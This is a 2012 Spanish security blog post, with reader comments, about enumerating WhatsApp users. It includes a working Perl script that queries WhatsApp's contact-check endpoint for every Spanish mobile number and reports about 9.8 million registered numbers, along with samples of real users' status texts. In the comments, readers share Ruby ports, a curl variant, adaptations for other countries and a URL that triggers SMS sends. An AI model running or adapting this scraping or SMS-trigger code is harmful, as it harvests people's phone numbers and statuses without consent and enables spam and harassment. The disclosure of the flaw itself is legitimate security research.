02 marzo 2012

Casi 10 millones de móviles españoles con WhatsApp instalado.

¡Qué pesados somos con whatsapp! Ya, bueno, eso es mentira. Realmente somos pesados con todo.

Haciendo algunos ejercicios con aplicaciones de iPhone, me dio por mirar  un poco WhatsApp, como ya hiciera Yago o Alberto antes, pero es que la aplicación da tanto juego, que se puede hablar de ella muchas más veces.

Una de las cosas que observé en ese análisis es que cuando arranca, comprueba el estado de tus contactos y de esa forma, saber que personas de tu agenda usan el servicio.

Esta petición se realiza mediante HTTPS contra su servidor web con una llamada muy simple a la URL: https://sro.whatsapp.net/client/iphone/iq.php, que devuelve un plist con sus mensajes y disponibilidad.

        <dict>
               <key>P</key>
               <string>+34600000158</string>
               <key>T</key>
               <integer>6151511</integer>
               <key>S</key>
               <string>Hey there! I am using WhatsApp.</string>
               <key>JID</key>
               <string>34600000158</string>
               <key>NP</key>
               <true/>
       </dict>

El resto de esta entrada,  pues ya os lo podéis imaginar: script en perl, lista de teléfonos registrados de España y a probar y cotillear cuantos hay usando el servicio y que estados graciosos hay. ¿Aburrido? No, ¡inquieto!

La lista de prefijos de teléfono registrados es pública y se puede descargar en un fichero zip de esta página web: http://www.cmt.es/cmt_ptl_ext/SelectOption.do?nav=bases&categoria=descarga


El script en perl no es que soporte threads ni sea nada del otro mundo pero oye... funciona.


#!/usr/bin/perl
use LWP::UserAgent;
my $ua = new LWP::UserAgent;
open A,"num.txt";
my @a=<A>;
my $i=0;
foreach my $b (@a){
  chomp $b;
  foreach $g (0..99) {
       $i++;
       my $post="";
       $post="cd=1&cc=34&me=600000000";
       foreach(0..9999) {
               $post .= sprintf ("&u%%5B%%5D=%%2B34$b%02d%04d",$g,$_);
       }
       print "get $i\n";
       my $req = new HTTP::Request 'POST','https://sro.whatsapp.net/client/iphone/iq.php';
       $req->content_type('application/x-www-form-urlencoded');
       $req->content("$post");
       my $res = $ua->request($req);
       print $res->as_string;
  }
}

El resultado, cuando lo ejecuté el 10 de febrero y tras generar un log de 2Gb: 9.832.654 de números registrados.

Y algunos estados de gente graciosos:

HACKERS:
                <string>pirateando conversaciones, menuda hacker</string>
               <string>Xx_Hackero_xX</string>
               <string>The Mind Hackers is Here!!!</string>
               <string>HACKERMAN !!!</string>
               <string>I'm not a Hacker, I'm a &#34;Security Professional&#34;</string>
               <string>Hacker</string>
               <string>*** Hacker. Hacker ***</string>
               <string>Hacker mater</string>
               <string>hacker</string>
               <string>Hacker î
                               </string>
               <string>Heart Hacker Rembo Now Is Here</string>
               <string>Hacker</string>
               <string>Soy una hacker!!!!...patosa!!!î

</string>
               <string>MaDr!D HaCKeR</string>
               <string>De Hacker por la Red</string>
               <string>Hacker</string>
               <string>The HACKER</string>
               <string>De examenes toda la semana.. Certified Ethical Hacker</string>
               <string>Don't Panic! A 'hacker' is different from a 'cracker'.</string>
               <string>Te reviento hacker!! Jaja</string>
               <string>~Hacker~</string>
               <string>android hacker</string>
               <string>@andyyhacker</string>
               <string>Quien viene a ver Hackers?????</string>
               <string>Hacker, Blade Runner.</string>
               <string>ahhahah soy un porulo hacker :Pî
                                                       ½</string>
               <string>Hackerdelmelo is hacking OFM</string>
               <string>Saber romper medidas de seguridad no hacen k seas hacker al igual que saber hacer un puente en un coche no te convierte en un ingeniero</string>
               <string>Me sty volviendo hacker</string>
               <string>Xx_putoshackers_xX</string>
               <string>el puto hacker</string>
               <string>î®HACKERî®</string>
               <string>Y si, morire de frio o de sueño, quiero ser hacker u3u</string>
               <string>el hacker crea y el gobierno destruye</string>
               <string>VOTAD x ROLLING HACKERS!!!</string>
               <string>Los hackers son los padres</string>
               <string>Cagüen el hacker...</string>
               <string>îMarzo Negro.contra la ley sopa.ANONYMUS planea el mayor atake hacker</string>
               <string>Certified Ethical Hacker</string>
               <string>Mi Objetivo: Hacker de la vida</string>

SECURITY


               <string>I'm not a Hacker, I'm a &#34;Security Professional&#34;</string>
               <string>Ibiza Security</string>
               <string>Shadows Are Security</string>
               <string>Buguroo Offensive Security</string>
               <string>Gordo Te amo (L) bailar,bailar,bailar! Security dance! :) mucha fiesta y muchas actuaciones! :p</string>
               <string>the security men</string>
               <string>SecurityViolationException: empty head on 'remote_user':47</string>
               <string>Panda Security - cloudantivirus.com</string>
               <string>Ibiza Security</string>
               <string>Your Security is my Business...</string>
               <string>Paid off security and got through the gate...</string>
               <string>I'll be ur security!!</string>
               <string>security!!!! ai ai ai ai</string>
               <string>security private î
con dos cojones vamos a x elloî</string>
               <string>Grupo Security Dogs</string>
               <string>internet and security terrorims</string>

Y finalmente, uno de mis favoritos:


<string>Yo no digo que esa chica sea un poco suelta, solo digo que si su entrepierna tuviera contraseña, serí­a '1234'</string>

96 comments :

Jorge Garcia dijo...

muy bueno, alex. 

Carlos2012 dijo...

Hola, como podria usar esto con otras numeraciones para otros paises

Alejandro Ramos dijo...

Crea un fichero "num.txt" con los tres primeros números para tu país, y poco más...

Madrikeka dijo...

Me alegro de no ser una de esos casi 10 millones XD

p0is0n-123 dijo...

WhatsApp al más puro estilo by default }:))
Pero bueno, cuando después de actualizar no solucionaron el tema del tráfico cifrado, esto era de esperar :P

Felicidades por el post Alejandro, me ha gustado mucho (y gracias por citarme en la entrada) :)

Un saludo!

Anónimo dijo...

Muy bueno como siempre. Me he partido con Yo no digo que esa chica sea un poco suelta, solo digo que si su entrepierna tuviera contraseña, serí a '1234'

Sinkmanu dijo...

Jaja, muy buena la última frase. En cuanto a lo demás en españa ahora hay números que también empiezan por 7, así que ha ocupar un poco más de espacio en disco!! 

Nicolás Boettcher dijo...

Me aparece el siguiente error al ejecutar el .pl:
Unrecognized character \xC2 in column 1 at telefonos.pl line 8.

Jsps St dijo...

mm y algo mas ? jeje que es ese algo mas el codigo de area ?

Rom de los rios dijo...

Solo por curiosidad. Podrias cambiar el estado de la persona? Ah y otra cosa "Cómo se supone que haces eso" [Obviamente no entendi nada, pero estoy subscrito a ustedes desde hace un tiempo y esto me intereso bastante] Saludos.

Evil Dark Angel dijo...

https://sro.whatsapp.net/client/iphone/iq.php?cd=1&cc=34&me=600000000&u=676767676



Warning: array_unshift() expects parameter 1 to be array, string given in /usr/home/whatsapp/public_html/sro.whatsapp.net/client/iphone/iq.php on line 169



Warning: Cannot modify header information - headers already sent
by (output started at
/usr/home/whatsapp/public_html/sro.whatsapp.net/client/iphone/iq.php:169)
in /usr/home/whatsapp/public_html/sro.whatsapp.net/client/iphone/iq.php on line 171







Warning: Invalid argument supplied for foreach() in /usr/home/whatsapp/public_html/sro.whatsapp.net/client/iphone/iq.php on line 184Toma!

Evil Dark Angel dijo...

https://sro.whatsapp.net/client/iphone/iq.php?cd=1&cc=34&me=600000000&u=676767676




Warning: array_unshift() expects parameter 1 to be array, string given in /usr/home/whatsapp/public_html/sro.whatsapp.net/client/iphone/iq.php on line 169



Warning: Cannot modify header information - headers already sent
by (output started at
/usr/home/whatsapp/public_html/sro.whatsapp.net/client/iphone/iq.php:169)
in /usr/home/whatsapp/public_html/sro.whatsapp.net/client/iphone/iq.php on line 171







Warning: Invalid argument supplied for foreach() in /usr/home/whatsapp/public_html/sro.whatsapp.net/client/iphone/iq.php on line 184

Increible...

Laturba dijo...

He estado haciendo pruebas en la actualización propia y de estados de amigos y se transmite en ssl. También ocurre lo mismo con vuestra aplicación. ¿Como habéis descifrado lo que se envía en el paquete, para hacer vuestro programa? Ya que después de varias pruebas no he sido capaz :S. Y me gustaría poder leer que se envía y se recibe en texto. Gracias

Alejandro Ramos dijo...

Yo me he limitado a aquellos que dice la CMT, que son los que regulan.. si hay 7XX, estarán en esa lista ;)

edulan dijo...

Hola, he portado tu script de perl a Ruby y este es el resultado:

https://gist.github.com/1964012#file_wastcrawl.rb

Al trastear un rato con los estados me he dado cuenta de que se pueden descubrir cosas realmente sorprendentes. Por ejemplo, haciendo un grep y buscando por "@", puedes obtener un mapeo de cuentas de Twitter y números de teléfono. Y eso que el log generado es de apenas 1MB.

PD: Te he enlazado en los comentarios del crawler, espero que no te importe.

Alejandro Ramos dijo...

Antes se podía cambiar, reportaron el fallo y ahora parece que lo han arreglado.

En cuanto a como se hace, si no lo has entendido no se si seré capaz de explicartelo. Básicamente se aprovecha de que cuando tu te conectas con tu whatsapp a la red de whatsapp consultas el estado de tu agenda. Lo que aquí se aplica, es consultar una agenda que "incluye todos los números posibles de España" o algo similar :)

Alejandro Ramos dijo...

Esto ya se explico hace algunas semanas para terminales IOS. Revisate las entradas ;)

Alejandro Ramos dijo...

¡Genial!

Nukeador dijo...

A mi lo que me da miedo es que alguien añada a sus contactos todos los números y empiece a enviar spam, dado que cualquier que te añada puede mandarte mensajes sin tu previa aprobación...

Reg dijo...

me puede decir que nº hay que poner en el archivo txt?¿

Pepe dijo...

Que bueno Alex, me ha dejado sorprendido esta noticia. Que ansias de conocimientos y cuantas ganas de explorar teneis, eso me fascina.

Lo mejor de todo, la frase del amigo: "Yo no digo que esa chica sea un poco suelta, solo digo que si su entrepierna tuviera contraseña, serí­a '1234' "

Car dijo...

Ohh¡¡, tremendo de verdad que sois de lo que no hay. Que peligro tenéis.

Alejandro Ramos dijo...

Gracias Car! y Pepe!

MagiCsito dijo...

jajajaja mamon que de tiempo libre tienes :P
Está guapo el post :) 
¿Qué utilidad le podemos dar a esto? }:)

Alejandro Ramos dijo...

No, ni un solo segundo libre, solo que lo aprovecho de distinta forma que otros que prefieren ver el futbol ;p

ninguna, a priori hacer spam y poco más...

omarbv dijo...

¿Y si haces que Whatsapp envíe 10 millones de SMS?
https://r.whatsapp.net/v1/code.php?method=sms&to=34600000158&in=600000158&cc=34&lg=de&lc=AT&mcc=000&mnc=000

xDDD

Francisco dijo...

Esa frase de "Los hackers son los padres" bien podría haber sido un tweet de 48bits :P

Javier Ortega Conde dijo...

 Parece que el valor T es el tiempo en segundos que lleva la persona
conectada. Mucha gente no desconecta el móvil ni a la noche y por ello
indica que lleva cientos de días conectad@. He modificado el script en
Ruby (como he podido que no se Ruby ni Perl) para que me informe de una
lista de móviles concreta en vez de analizar todos los posibles.

Alejandro Ramos dijo...

No será el tiempo en el que se cambió el estado? También se contabiliza... 

Abilio Almeida Eiroa dijo...

Pues yo creo que deberíamos de empezar a spamear, a ver si así se toman en serio la seguridad :S

Gerswin Lee dijo...

lo puedo correr desde linux o desde donde?

Anónimo dijo...

Capturando data de Venezuela, ya les contaré...

Daniel Rubio Rocamora dijo...

Muy buen post, sabía que whatsapp era una gran decepción en cuanto a seguridad, pero no me imaginaba que sería tan, tan, tan, pero tan tremendamente fácil hacer este tipo de cosas.
Gracias por aportar luz a la gente de a pié como nosotros ;)

Andrés Álvarez Iglesias dijo...

Wow! Genial post. Y muy ingenioso el método. Felicidades :)

salirdeinternet.com dijo...

Qué dice de esto la Agencia Española de Protección de Datos??
Muy buen artículo (como siempre)

chencho dijo...

y no es más fácil un curl? 
curl -d "cd=1&cc=34&me=600000000&u[]=" https://sro.whatsapp.net/client/iphone/iq.php

Luigi dijo...

Me pasaría el día leyendo los estados de la gente, deberías ponerlo en un pastebin, para jugar a donde está wally? con nuestro propio estado.

Marcos Bagu dijo...

Menudo juanker que no tiene ni pajolera de coficación de caracteres :D

Infotics dijo...

Muy bueno el artículo, necesario para que sepamos lo que ocurre con las tecnologías en general y sobre todo con aquellas que instalamos como autómatas y presentan fallos de seguridad como ésta.

Aprovechando la licencia, lo he colocado en infotics.es: http://infotics.es/2012/03/06/casi-10-millones-de-moviles-espanoles-con-whatsapp-instalado/, si hubiera algún problema coméntame y lo retiro o modifico o lo que sea.
Salud!

Tester13 dijo...

Me gustaría probarlo para méxico, la clave de internacional es 52

Archtron dijo...

Al correrlo en ruby me sale un error.
undefined method `encode_www_form' for URI:Module (NoMethodError)
En donde dice:
uri.query = URI.encode_www_form(PARAMS + numbers)

Yo dijo...

 Me parece un poco absurdo volver a poner el texto cambiando solo el prefijo, pero en fin.

Te quedó cambiar el cc también.

jorge dijo...

amigo como descargo las conversaciones que he realizado desde mi celular?

yoooo dijo...

me gustaria poder descargar a mi tambien el log, y renovarlo cada semana!!! por favor ¿como puedo hacerlo? xd

yoooo dijo...

 supongo que nada, aquí no hay ningun dato personal...

edulan dijo...

Prueba con la versión 1.9.2 de Ruby, con la 1.8.7 me sale el error que dices y se debe a que ese método sólo se ha añadido a la rama 1.9.x.

Mail dijo...

 me da un error el ruby, "ruby.rb:13:in `require': no such file to load -- plist (LoadError)" he instalado el plist:    gem install plist    y sigu e saliendo error, buscando en google dice que la solución és la que he hecho (gem install...)   no termino de ver porqué me sigue sin funcionar? (He hecho algo mal?)

edulan dijo...

Primero mira si la instalación de la gema plist ha ido bien (no te ha dado ningún error ni advertencia, que no debería).
Otra posible causa es que necesites incluir rubygems, para ello ejecuta el siguiente comando:ruby -r rubygems wastcrawl.rbSi sigue sin funcionar, dime qué SO y versión de Ruby utilizas para poder reproducirlo. Puedes ver la versión de Ruby con:ruby -vUn saludo.

Archtron dijo...

Escribe como primer require:
require 'rubygems'

alehpons dijo...

Hola, por mas que lo intento no consigo que reaccione. Uso Ubuntu 11.10 y lo ejecuto desde la terminal con:

perl whatsapp.pl datos.txt

ó

perl whatsapp.pl

y no consigo que me de resultados, ni respuesta.

¿Podrías dar unas instrucciones para novatos del perl? :)

Un saludete

Anónimo dijo...

Según esto, podría hacerse spam masivo a todos los usuarios whatsapp de España, no?
Supongo que habrá muchas protecciones contra ataques de este tipo...

Carlosgb dijo...

que pasa si te denuncia whatsapp por juankeo?
 o te denuncio yo mediante la AGPD por almacenar mi teléfono y estado?

Alejandro Ramos dijo...

Me da pereza contestarte, pero que no se diga.

1.- Yo no he hackeado nada, no soy hacker. Tan solo he hecho una consulta que ellos mismos hacen. ¿O acaso no puedo tener en la agenda de mi móvil todos los teléfono de España? Puestos a decir soplapolleces infantiles: lo mismo soy yo el que los denuncia por no tener las medidas necesarias de seguridad?2.- A) Tu teléfono móvil no es un dato de carácter personal. 
B) No lo tengo almacenado
C) Cuando vayas, diles que me conoces, te harán más caso, por lo menos hasta que les digas de que se trata.

Un saludo hamijo del civerespacio y gracias por tu comentario

Andrea Perez dijo...

Hola, cual es el significado de los parametros :
cd="1" ?
cc="34" Esto es el codigo de pais ?
me="60000000" Esto es la mascara interna para la operadora?
u[]="" Esto es la lista de array de los numeros ?

Muchas gracias!

Carlosgb dijo...

Hacer 20 milllones de peticiones en poco tiempo a un servidor web puede ser considerado un ataque DOS.
Me gustaría saber por ejemplo que harían los administradores de los servidores de la agencia tributaria al ver que les has hecho 40 millones de peticiones en 5 minutos y les has saturado los servidores.Me da que avisan a la guardia civil.

No te tomes a mal mis mensajes, solo estoy comentando el aspecto de las peticiones masivas desde el punto de vista del administrador de sistemas.

Alejandro Ramos dijo...

Ahá.

No son 20 millones de peticiones, en cada una de ellas se comprueban miles de teléfonos.

Otro punto es que, el que yo quiera hacer 40 millones de peticiones en 5 minutos, no significa que pueda. Salvo tenga muchas miles de máquinas en distintas redes desde las que pueda hacerlo... y no es el caso.

La próxima vez tal vez deberías evitar términos como juanker, denunciarme y cosas así para que no me lo tome a mal.

Mail dijo...

 Al final si hago:
ruby -plist nombre.rb     si que funciona sin darme error

yooop dijo...

hola!!!! Por favor, cómo puedo hacerme yo con el log de estados whatsapp? xd me gustaria ejecutar el script pero no tengo ni idea de programacion ni de perl ni rugby ni nada parecido. No he salido del html :( gracias por informarrrrr

Yo dijo...

 Si, pero entonces todos los juanquers de fuera de españa que quieren probarlo en sus países no podrían ;)

Yo dijo...

 No se ha mirado el script. Yo reconozco que lo lancé contra localhost e hice un netcat para ver que hacía antes de lanzarlo y construir el html porque de perl, poco.

edulan dijo...

¿Qué versión de Ruby estás utilizando?

Gst990 dijo...

Matate idiota, no deberias estar en esta pagina. No molestes aca lammer de 4ta.

Dario90 dijo...

Ya no devuelve los datos, ahora tira un "no array to process given" asi que ya no sirve.

Yo dijo...

A mi me funciona perfectamente todavía, seguramente estés pasando algún parámetro mal.

daniel dijo...

Al ejecutar lo único que me devuelve es "1" y nada más,

hyp dijo...

Algún motivo por el que entregue: 500 Can't connect to sro.whatsapp.net:443 (Bad hostname 'sro.whatsapp.net')  ??

Andrea Perez dijo...

Alejandro, como pudiste solucionar el problema de los mensajes "picados"  o tener algunos caracteres extranos cuando los recibes del servidor? Estoy teniendo un poco de problema para parsear el XML debido a esos errores. Estoy usando lwp pero voy a intentar usando curl o otra libreria aver. Me gustaria saber tu opinion saludos

Alejandro Ramos dijo...

Tienes un problema con el Accept-Encoding que mandas y recibes. Asegurate que ambos corresponden a lo que quieres. En algunos estádos hay icónos de emoji, vaya, la famosa mierda con ojitos y eso llega como UTF-8.

Ya me contarás cual es el propósito de tu cotilleo! :)

Sroj dijo...

El script perl del post parece ligeramente incompleto, pero este pack me funciona: http://pastebin.com/VPyCqJHm y http://pastebin.com/D3jnVAtP

Míriam dijo...

Hola, te escuche el otro día por la radio y me pareció muy interesante lo que contaste. Tengo una curiosidad respecto a esta aplicación. ¿Hay alguna forma de mantener el whatsapp siempre en línea mientras utilizas otra aplicación o simplemente sin ver la pantalla de whatsapp? Es decir, aparecer en línea pero sin estar dentro de whatsapp aunque este no este cerrado. Yo tengo un iphone .
Muchas gracias.

Un saludo.

Juanj dijo...

Implementación en forma de webapp: http://www.guasap.co.cc

Andrea Perez1970 dijo...

Al parecer ese servidor siempre responde con chunked, que pena que lwp maneje mal ese metodo de encoding. Actualmente estoy usando curl pero no me gusta usarlo por sus problemas con los threads. Tu pudiste hacerlo andar con lwp?.
El proposito meramente educativo, estoy probandolo con paises de america latina (Brasil, Colombia) y funciona de re chupete jeje. Pero me gustaria tener bases para una implementacion seria basada en threads!

Dap dijo...

yo lo e intentado hacer con chile pero nada :( una mano porfa

Daniel Godoy dijo...

mi aporte con los creditos correspondientes http://pastebin.com/4RddreiX

Daniel Godoy dijo...

 una modificacio le hice http://pastebin.com/ffDK2V9h

Antonioguay_168 dijo...

quisiera saber si haciendo un duplicado de la tarjeta con el mismo numero de telefono movil, podria descargar doblemente el whasap...... y aparte de descargarlo, que las conversaciones desde un movil aparezcan tambien en el otro movil con el duplicado de la tarjeta.

Archtron dijo...

 Ya instalé Ruby 1.9.2 y ahora sí me funcioná. Si quiero sacar listados de otros paises ademas del codigo de area que es lo que tendria que cambiar??

edulan dijo...

 Para utilizar el script con otros países, tendrías que investigar cúal es el sistema de numeración que emplea dicho pais.
El funcionamiento para España es el siguiente:

Se obtienen los prefijos telefónicos disponibles del archivo moviles.txt, se generan los bloques de 6 cifras siguientes, se generan 1000 peticiones de 1000 números para cada prefijo (si generas una sóla petición con todos los números, puedes obtener un 414 Request URI too long).

Desde luego el script se puede mejorar en muchos aspectos, como desacoplar la lógica que genera los números para utilizarla con otros países, utilizar hilos para realizar las peticiones y acelerar el proceso, o generar sólo números válidos (que actualmente sólo se tiene en cuenta el prefijo).

Williams Nasser dijo...

LA MONTE Y LA PROBE YA NO FUNCIONA :(

Williams Nasser dijo...

SOLO PARA ESPAÑA ESTA...

Luis dijo...

el parametro cc que en el caso de españa es 34, es el unico que cambia entre paises cierto?

Agt Pirrone dijo...

Veamos, en el caso de que esta vulnerabilidad no haya sido parchada, si yo quisiera hacer una búsqueda mas acotada, con el código de Argentina y solo los 100.000 números que comprende mi código de área.

Debería colocar el código de área en el archivo "num.txt"? o repetir esta info en el txt y en el script de PERL?
Por otro lado, adonde queda el output de tal petición? Dicen que en los logs, pero donde se encontrarían esos logs? 

Muchas gracias, y perdon por mi ignorancia.

Agt Pirrone dijo...

Bueno me contesto yo solo. Luego de investigar estoy corriendo desde cmd con el modificador >> para crear un .txt  y ya.

De hecho modifique el script para que la peticion envie un string asi:
....iq.php?cd=1&cc=54&me=294000000&u=2984320001Y me dio mejor resultado que usando u[]=54....(debe ser por mi falta de conocimiento)Lo que me sorprende es la velocidad del proceso, a razon de 2000 numeros por hora. Debo estar haciendo algo mal, pero si estoy haciendolo correctamente que abrumador debe haber sido recolectar 10 millones!Saludos!

Antonio dijo...

muy buena aplicacion agregenme 5217971136514

Aliciapilarjorgeherrera dijo...

me gustaria recuperar mis mensajes de watsap borrados

Brujofalcon dijo...

y eso como se ejecuta s epodria ahceer en otro lenguaje d eprogramacion es decir php? gracias.

Anónimo dijo...

¿Esta vulnerabilidad sigue siendo "explotable"? He ejecutado el script pero me devuelve las cabeceras XML con un array vacio...

pspx dijo...

Se pueden ver tb las imáges de perfil de un número con algo así? Vaya tela, es muy inseguro...

Alex dijo...

bueno, pero por ejemplo para un script en bash iria de PM usar curl o wget y un par de variables, y listo. ademas podriamos añadir un poco mas de lógica para obtener el prefijo de pais a partir del numero completo.
son solo ideas. igual me pongo a picar un poco de código en bash a ver qué sale.
tonto el último! jejeje
salu2,
Alex

Alex dijo...

BTW, perdona el slowpokeismo que me he marcado aqui, respondiendo a un comentario 9 months old xD

alex dijo...

juankeo? donde está el juankeo? se está demostrando una falta grave de diseño ya existente, nada que ver. ni si quiera es un "crackeo". si cualquiera añadiese en la agenda de su movil todos los numeros desde 600000000 hasta 722999999 conseguiria exactamente la misma información, porque es literalmente PUBLICA.
si denuncias a secbydefault, pierdes el pleito por los supuesto que te acabo de comentar. si quieres ganar dinero a costa de joder a alguien, prueba tú a denunciar a whatsapp por el no complimiento de la LOPD, tienes mas posibilidades ;)

Javi dijo...

ya no funciona este método :-/

Daniel Rubio Rocamora dijo...

whatsapp cambió la forma de conectarse, creo que incluye ahora algún tipo de ID sin el cual no te deja obtener estos datos... Solo lo han complicado un poco mas, pero poder, siempre se puede. :)

fernando dijo...

mi whatssapp +573148452166

kiquenet kiquenet dijo...

http://www.cmt.es/cmt_ptl_ext/SelectOption.do?nav=bases&categoria=descarga no se encuentra

Andrea Del Mar Gómez C dijo...

Aun se puede hacer esto?